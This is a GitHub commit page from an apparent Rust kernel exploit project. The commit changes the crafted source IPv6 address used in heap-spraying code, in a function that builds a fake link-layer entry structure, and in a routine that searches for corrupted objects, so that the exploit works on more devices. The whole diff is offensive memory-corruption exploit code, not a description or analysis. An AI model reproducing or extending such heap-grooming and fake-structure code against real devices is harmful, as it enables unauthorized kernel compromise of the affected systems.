Skip to content

Commit

Permalink
Use IPv6 address that works on all devices. Thanks to Borris-ta.
Browse files Browse the repository at this point in the history
  • Loading branch information
@fedebuonco
fedebuonco committed Oct 29, 2024
1 parent 6edda35 commit b0f6cb2
Show file tree
Hide file tree
Showing 3 changed files with 4 additions and 4 deletions.
2 changes: 1 addition & 1 deletion src/constants.rs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -83,5 +83,5 @@ pub const VM_PROT_ALL: u64 = VM_PROT_READ | VM_PROT_WRITE | VM_PROT_EXECUTE;

pub const SOURCE_MAC: [u8; 6] = [0x41; 6];
pub const SOURCE_IPV6: [u8; 16] = [
0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x9f, 0x9f, 0x41, 0xff, 0x9f, 0x9f, 0x41, 0xff,
];
2 changes: 1 addition & 1 deletion src/exploit/exploit.rs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -384,7 +384,7 @@ pub fn build_fake_lle(
fake_lle.extend(&0u32.to_le_bytes()); // sin6_flowinfo
let sin6_addr = 0xfe80000100000000u64.to_be_bytes();
fake_lle.extend(&sin6_addr);
let sin6_addr_2 = 0x4141414141414141u64.to_be_bytes();
let sin6_addr_2 = 0x9f9f41ff9f9f41ffu64.to_be_bytes();
fake_lle.extend(&sin6_addr_2);
fake_lle.extend(&0u32.to_le_bytes()); // sin6_scope_id

Expand Down
4 changes: 2 additions & 2 deletions src/exploit/utils.rs
View file
Original file line number Diff line number Diff line change
Expand Up @@ -96,7 +96,7 @@ pub fn search_for_corrupted_obj(
if i >= constants::HOLE_START && i % constants::HOLE_SPACE == 0 {
continue;
}
let source_v6_string = format!("fe80::{:04x}:4141:4141:4141", i);
let source_v6_string = format!("fe80::{:04x}:41ff:9f9f:41ff", i);
let source_v6: [u8; 16] = std::net::Ipv6Addr::from_str(&source_v6_string)
.expect("Failed to parse IPv6 address")
.octets();
Expand Down Expand Up @@ -134,7 +134,7 @@ pub fn spray(
print!("\r[+] Heap Grooming at {}%", progress);
io::stdout().flush().unwrap();

let source_v6_string = format!("fe80::{:04x}:4141:4141:4141", i);
let source_v6_string = format!("fe80::{:04x}:41ff:9f9f:41ff", i);
let source_v6: [u8; 16] = std::net::Ipv6Addr::from_str(&source_v6_string)
.expect("Failed to parse IPv6 address")
.octets();
Expand Down

0 comments on commit b0f6cb2

Please sign in to comment.